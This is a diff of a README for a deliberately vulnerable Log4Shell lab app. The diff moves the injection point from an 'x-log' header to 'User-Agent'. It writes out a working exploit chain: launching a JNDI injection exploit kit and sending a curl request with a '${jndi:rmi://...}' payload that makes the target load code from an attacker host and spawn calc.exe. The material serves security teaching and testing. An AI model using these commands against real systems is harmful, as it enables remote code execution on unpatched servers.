zerokeeper/log4shell-vulnerable-app/README.md

 2. Launch the JNDI Injection Exploit Kit on the attacker host after building with `mvn package` with `java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'calc.exe'` (the payload will execute calc.exe on the target).
 Helper servers are started now on 192.168.56.1.
 Assuming the RMI url for trustURLCodeBase false config is `rmi://192.168.56.1:1099/xzmtee`.

-3. Trigger the exploit by sending the malicious payload through the "x-log" header: `curl http://192.168.56.101:8888/app/servlet -H 'x-log: ${jndi:rmi://192.168.56.1:1099/xzmtee}`
+3. Trigger the exploit by sending the malicious payload through the "User-Agent" header: `curl http://192.168.56.101:8888/app/servlet -H 'User-Agent: ${jndi:rmi://192.168.56.1:1099/xzmtee}`

-4. The app should use the vulnerable log4j for logging the contents of the "x-log" header.
+4. The app should use the vulnerable log4j for logging the contents of the "User-Agent" header.
 While logging, it looks up the referenced RMI URL, and the JNDI Kit sends the RCE payload classloading reference.

-5. Note, that instead of logging the actual content of the "x-log" header, the referenced class name ("javax.el.ELProcessor") gets logged.
+5. Note, that instead of logging the actual content of the "User-Agent" header, the referenced class name ("javax.el.ELProcessor") gets logged.

 6. On the target host, calc.exe should be spawned, reaching RCE.